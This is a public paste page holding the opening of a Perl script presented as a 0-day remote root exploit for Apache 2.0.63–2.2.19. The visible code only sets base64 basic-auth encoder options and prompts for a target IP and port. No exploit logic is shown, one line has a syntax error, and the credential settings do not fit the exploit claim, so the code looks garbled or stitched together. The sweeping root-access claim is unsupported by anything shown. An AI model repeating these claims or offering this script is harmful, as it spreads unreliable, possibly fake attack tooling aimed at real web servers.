Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on Jun 5th, 2011  |  syntax: None  |  size: 1.12 KB  |  hits: 8,718  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/perl
  2. #
  3. # Apache 2.0.63 - 2.2.19 Remote Exploit
  4. #
  5. # This 0-day exploit will remotely gain root on any apache server from version 2.0.63 to 2.2.19
  6. # Beta release 2.3.12-beta was also compromised by an affiliate - need verification
  7.  
  8. # Base64 Encoder
  9.  
  10. # Authentication with the server via HTTP's basic auth, input string
  11. # to encode BASE64 , and '%s' for credentials.  eg base64 %s
  12.  
  13. # output base64 userid:password
  14.  
  15. # If your decoder requires you to use STDIN to pass the password
  16. # (no pun intended), set $BASE64_USE_STDIN to nonzero and do not
  17. # use '%s' on the command-line.
  18. $BASE64_CMD_STRING = "use_base64_encoder_here %s";
  19.  
  20. # Base64 encoder pipe
  21. # Encoder passwd output to STDIN, set to non-zero val.
  22. $BASE64_USE_STDIN = 0'
  23.  
  24. # Base64 encoder input handling
  25. #
  26. # Encoder requires newline after credentials,
  27. # set this to your newline char
  28.  
  29. $BASE64_WRITE_NEWLINE = "";
  30.  
  31.  
  32.  
  33.  
  34. use IO::Socket;
  35. print STDOUT "Apache 2.0.63 - 2.2.19 Remote 0-day Exploit\r\n";
  36. print STDOUT "Enter ip addr of apache server: ";
  37. $line = <STDIN>;
  38. $host = mychomp($line);
  39. print STDOUT "Enter port of apache server \[80\]: ";
  40. $line = <STDIN>;
  41. $port = mychomp($line);
create a new version of this paste RAW Paste Data